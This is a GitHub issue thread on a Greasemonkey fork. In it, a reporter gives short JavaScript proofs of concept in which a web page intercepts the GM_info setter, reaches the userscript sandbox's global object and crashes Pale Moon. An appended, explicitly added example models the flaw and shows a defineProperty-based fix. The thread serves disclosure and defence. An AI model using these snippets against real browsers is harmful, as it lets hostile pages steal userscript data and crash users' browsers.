janekptacijarabaci / greasemonkey

Greasemonkey is a user script manager for Firefox.
http://www.greasespot.net/

setter abuse #20

Open xBZZZZ opened 3 years ago

xBZZZZ commented 3 years ago

Note: there needs to be a running userscript.

A web page can get the GM_info object like this:

open(location.href).__defineSetter__("GM_info",console.log)

A web page can get the sandbox object like this:

open("/").__defineSetter__("GM_info",v=>{
  const sandbox=v.toString.constructor("return this")()
  console.log(sandbox)
})

A web page can CRASH Pale Moon like this:

open("/").__defineSetter__("GM_info",v=>{
  const sandbox=v.toString.constructor("return this")()
  new sandbox.XPCNativeWrapper(1)
})
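
A model of the setter interception reported above and one way to avoid it, as an added example that is not part of the original issue or of Greasemonkey's code. It assumes the sandbox inherits from the page's window and that GM_info is installed by plain assignment; plain objects stand in for both, and all function names are hypothetical.

```javascript
// Model only: plain objects stand in for the page window and the script sandbox.
// Assumption: the sandbox inherits from the page's window object.
function makePage(leaks) {
  const page = {};
  // Page-controlled accessor named GM_info (constructed stand-in for the report).
  Object.defineProperty(page, "GM_info", {
    set(v) { leaks.push(v); },
    configurable: true,
  });
  return page;
}

// Check: walk the prototype chain and report an inherited setter for `name`.
function findInheritedSetter(obj, name) {
  for (let p = Object.getPrototypeOf(obj); p; p = Object.getPrototypeOf(p)) {
    const d = Object.getOwnPropertyDescriptor(p, name);
    if (d) return typeof d.set === "function" ? d.set : null;
  }
  return null;
}

// Weak: [[Set]] consults the prototype chain, so the page's setter runs.
function installByAssignment(sandbox, name, value) {
  sandbox[name] = value;
}

// Hardened: [[DefineOwnProperty]] creates an own data property; no setter runs.
function installByDefine(sandbox, name, value) {
  Object.defineProperty(sandbox, name, {
    value, writable: false, enumerable: true, configurable: false,
  });
}

function run(install) {
  const leaks = [];
  const sandbox = Object.create(makePage(leaks));
  const info = { script: { name: "constructed-example" } }; // constructed sample
  const hadSetter = findInheritedSetter(sandbox, "GM_info") !== null;
  install(sandbox, "GM_info", info);
  return {
    hadSetter,
    leaked: leaks.includes(info),
    own: Object.prototype.hasOwnProperty.call(sandbox, "GM_info"),
  };
}

console.log("assignment:", run(installByAssignment));
console.log("defineProperty:", run(installByDefine));
```
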

FrostKnight commented 2 years ago

@xBZZZZ

We could use someone to fork this in general; it seems to be either dormant or gone...

If you knew how to fix it, feel free.